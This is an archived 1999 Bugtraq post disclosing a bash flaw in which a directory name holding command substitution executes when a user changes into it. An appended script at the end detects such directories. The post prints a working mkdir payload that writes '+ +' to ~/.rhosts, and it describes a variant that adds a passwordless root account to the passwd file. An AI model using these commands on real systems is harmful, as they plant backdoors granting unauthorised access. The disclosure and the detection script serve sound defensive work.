[10300] in bugtraq
Bash Bug
daemon@ATHENA.MIT.EDU (Shadow)
Wed Apr 21 19:56:10 1999
Date: Tue, 20 Apr 1999 21:25:47 -0400
Reply-To: Shadow <shadow@OPERATOR.ORG>
From: Shadow <shadow@OPERATOR.ORG>
To: BUGTRAQ@NETSPACE.ORG
Figured while everyone was working with bash, I might as well make this
one public (I apologize if this is old news, apparently it hasn't been fixed
if so).
If a user creates a directory with a command like
mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
and someone cd's into said directory, either by accident, or whatever,
then it will cause it to actually execute. I also did this with a passwd
file, echo a user such as r00t::0:0:\57root\57bin\57bash instead of + + to
the rhosts. Played with symlinks and a few other ways to see if perhaps
maybe the system could trip it if a user made the directory in say /tmp.
Granted it may be a long shot on the user's part, the ability to do so is a
bad thing IMHO. This didn't seem to work on any of my BSD boxes.
shadow - CLE
-------------------------------------------------------------------------
Most Failure is due to giving up, not realizing how close to success you
were - Thomas Edison
-------------------------------------------------------------------------
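
A defensive check for the condition the post describes, added here as an example and not part of the original message: it lists directories under a tree (a shared one such as /tmp, for instance) whose names contain command-substitution syntax. The function names are hypothetical, and treating a backtick or "$(" in a name as the marker is an assumption based on the mkdir command shown in the post.

```shell
#!/bin/sh
# Added example (not from the original post): find directories whose names
# contain shell command-substitution syntax, as in the mkdir command above.
# Assumption: a backtick or "$(" in a directory name is the marker of interest.

# Shared find expression: directories only, stay on one filesystem (-xdev),
# match on the final path component. The patterns are single-quoted so the
# shell hands them to find literally.
_scan() {
    root=$1; shift
    find "$root" -xdev -type d \( -name '*`*' -o -name '*$(*' \) "$@" 2>/dev/null
}

# Print matching paths, one per line. cat -v renders control characters
# visibly so a hostile name cannot rewrite the terminal it is listed on.
find_suspicious_dirs() {
    _scan "${1:-.}" -print | cat -v
}

# Print only the number of matches (correct even if a name contains newlines).
count_suspicious_dirs() {
    _scan "${1:-.}" -exec printf . \; | wc -c | tr -d ' '
}

# Run as a script: scan each directory given on the command line.
for dir in "$@"; do
    find_suspicious_dirs "$dir"
done
```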